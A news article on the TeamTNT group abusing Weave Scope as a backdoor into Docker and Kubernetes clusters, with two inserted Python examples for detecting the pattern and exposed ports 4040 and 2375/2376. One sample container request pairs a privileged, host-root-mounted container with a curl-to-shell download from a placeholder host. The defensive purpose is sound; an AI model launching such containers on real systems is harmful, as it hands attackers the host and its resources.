Weave Scope is now being abused in attacks on cloud environments

TeamTNT has added the legitimate Weave Scope tool to its attack toolkit in an effort to infiltrate cloud environments.

According to new research published by cybersecurity company Intezer and Microsoft this week, this may be the first time Weave Scope has been used in cloud-based attacks.

TeamTNT has been linked in the past to attacks on Docker and Kubernetes installations. Last month, the threat actors were connected to a cryptocurrency-mining botnet capable of stealing AWS credentials from servers. The group is also known for uploading malicious Docker images to Docker Hub.

Microsoft says that the malicious images detected in mid-August were deployed from a repository not seen in previous attacks. One Docker image in particular, pause-amd64:3.3, connects to a German-based server used by the group to deliver malicious scripts and other tooling.

The group's latest evolution, however, is the abuse of Weave Scope.

Weave Works' Weave Scope is open-source monitoring and visualization software for Docker, Kubernetes, the Distributed Cloud Operating System (DC/OS), and AWS Elastic Container Service (ECS). It lets users monitor running processes and container network connections across a cloud environment from a single interface. The software also allows administrators to open shells in containers on the cluster as root, and by default it requires no authentication.


While Weave Scope is a valuable and legitimate tool, TeamTNT takes advantage of cloud service misconfiguration and open access to port 4040 to deploy the software as a backdoor.

"We see that cluster administrators allow public access to this interface as well as other similar services," Microsoft says. "Attackers, including this group [TeamTNT], take advantage of this misconfiguration and use the public access to compromise Kubernetes clusters."


To install Weave Scope, TeamTNT first scans for an exposed Docker API. If one is found, a new privileged container is created from a clean Ubuntu image, with commands to mount the host's root file system into the container and to download and run cryptocurrency miners.

The next step in the attack chain is to set up a local privileged user on the host server, connect back over SSH as that user, and install Weave Scope.
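The first two steps above are visible to anyone who can see the Docker Engine API's container-create requests. The following is an added example, not code from the article, Intezer, Microsoft or Weave Works, that inspects the JSON body of a `POST /containers/create` request (the real API fields `Image`, `Cmd`, `HostConfig.Privileged`, `HostConfig.Binds` and `HostConfig.PidMode`) and flags the pattern described: a privileged container that bind-mounts the host root and runs a fetch-and-execute command. The two sample requests, the image tag and the URL in them are constructed for illustration.

```python
"""Flag Docker Engine API container-create requests matching the pattern
described above: privileged container, host root file system bind-mounted,
command that downloads and runs a payload.

Added example, not code from the ZDNet article, Intezer, Microsoft or
Weave Works. The sample requests below are constructed, not captured.
"""
import json
import re

# A bind spec is "host_path:container_path[:options]". A host path of "/"
# hands the container the entire host file system.
ROOT_BIND = re.compile(r"^/(?::|$)")

# Command fragments typical of "download and run" loaders.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|chmod\s+\+x")

PRIV = "privileged container requested"
ROOTFS = "host root file system bind-mounted"
HOSTPID = "host PID namespace shared"
FETCH = "command downloads and executes a payload"


def assess_create_request(body: dict) -> list[str]:
    """Return the list of findings for one create request (empty = clean)."""
    findings = []
    host = body.get("HostConfig") or {}
    binds = host.get("Binds") or []

    if host.get("Privileged"):
        findings.append(PRIV)
    if any(ROOT_BIND.match(b) for b in binds):
        findings.append(ROOTFS)
    if host.get("PidMode") == "host":
        findings.append(HOSTPID)

    cmd = body.get("Cmd") or []
    cmd_line = " ".join(cmd) if isinstance(cmd, list) else str(cmd)
    if FETCH_AND_RUN.search(cmd_line):
        findings.append(FETCH)
    return findings


def is_teamtnt_like(body: dict) -> bool:
    """Alert when the escape primitive (privileged + host root mount) is
    complete, or when either half of it is combined with a loader command."""
    findings = set(assess_create_request(body))
    escape = {PRIV, ROOTFS} & findings
    return bool(escape) and (len(escape) == 2 or FETCH in findings)


# Constructed sample requests (hypothetical image tag and URL).
BENIGN = {
    "Image": "nginx:1.19",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["web-content:/usr/share/nginx/html:ro"]},
}

SUSPICIOUS = {
    "Image": "ubuntu:18.04",
    "Cmd": ["/bin/sh", "-c", "curl -s http://example.invalid/setup.sh | sh"],
    "HostConfig": {"Privileged": True, "Binds": ["/:/host"], "PidMode": "host"},
}

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, json.dumps(assess_create_request(req)), is_teamtnt_like(req))
```

In practice the request bodies come from a Docker daemon audit log or an API proxy in front of the socket; a privileged container alone is common in legitimate tooling, which is why the alert condition pairs it with the host root mount or a loader command rather than firing on `Privileged` by itself.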

"Attackers install this tool to map their victim's cloud environment and execute system commands without deploying malicious code on the server," the researchers explain. "As far as we know, this is the first time attackers have downloaded legitimate third-party software to attack cloud infrastructure."

In effect, Weave Scope acts as a backdoor into cloud installations, giving attackers the ability to monitor systems, install applications, consume compute resources, and start, stop, or open shells in containers.


Because TeamTNT relies on existing Docker misconfigurations that leave port 4040 exposed, the researchers recommend that system administrators block incoming connections to that port and consider adopting zero-trust security practices in their cloud infrastructure.
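Before blocking anything, it helps to know whether a host is exposing the two services this attack chain depends on. The following is an added example, not from the article, Intezer, Microsoft or Weave Works: it reads the output of `ss -ltnH` (Linux iproute2: listening TCP sockets, numeric, no header) and reports the Weave Scope UI on TCP 4040 and the Docker Engine API on TCP 2375/2376 whenever they are bound to anything other than a loopback address. The sample `ss` lines are constructed.

```python
"""Report Weave Scope (4040) and Docker Engine API (2375/2376) listeners
bound to non-loopback addresses, from `ss -ltnH` output.

Added example, not from the article or the projects it describes.
Usage: ss -ltnH | python3 exposed_listeners.py
The SAMPLE_SS lines below are constructed.
"""
import ipaddress
import sys

WATCHED_PORTS = {
    4040: "Weave Scope UI (root shells into containers, no auth by default)",
    2375: "Docker Engine API without TLS",
    2376: "Docker Engine API with TLS",
}


def split_local_address(field: str) -> tuple[str, int]:
    """Split ss's 'Local Address:Port' field; IPv6 appears as [::]:4040."""
    host, _, port = field.rpartition(":")
    host = host.strip("[]")
    if host == "*":          # ss prints '*' for a wildcard bind on some versions
        host = "0.0.0.0"
    return host, int(port)


def is_reachable_bind(host: str) -> bool:
    """Loopback binds are only reachable on-host; anything else is exposed."""
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True          # unparsable address: assume the worst


def exposed_services(ss_lines) -> list[dict]:
    """Return one finding per watched port listening on a reachable address."""
    findings = []
    for line in ss_lines:
        parts = line.split()
        # Columns: State Recv-Q Send-Q Local:Port Peer:Port [Process]
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        host, port = split_local_address(parts[3])
        if port in WATCHED_PORTS and is_reachable_bind(host):
            findings.append({"port": port, "bind": host, "what": WATCHED_PORTS[port]})
    return findings


# Constructed sample: Scope on loopback (fine), Docker API on 0.0.0.0 and
# Scope on the IPv6 wildcard (both exposed), plus an unrelated SSH listener.
SAMPLE_SS = [
    "LISTEN 0 4096 127.0.0.1:4040 0.0.0.0:*",
    "LISTEN 0 4096 0.0.0.0:2375 0.0.0.0:*",
    "LISTEN 0 4096 [::]:4040 [::]:*",
    "LISTEN 0 128 0.0.0.0:22 0.0.0.0:*",
]

if __name__ == "__main__":
    lines = [l for l in sys.stdin] if not sys.stdin.isatty() else SAMPLE_SS
    for f in exposed_services(lines):
        print(f"EXPOSED {f['bind']}:{f['port']}  {f['what']}")
```

A clean result here is necessary but not sufficient: a host firewall or cloud security group can still be the only thing between a wildcard bind and the internet, so the bind address check should be paired with the port block the researchers recommend.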

"Misconfiguration seems to be one of the most common and harmful access vectors when it comes to Kubernetes cluster attacks," Microsoft said.

Update 16.38 BST: In response to the research, Weave Works issued a notice on how administrators can prevent misuse of the tool.
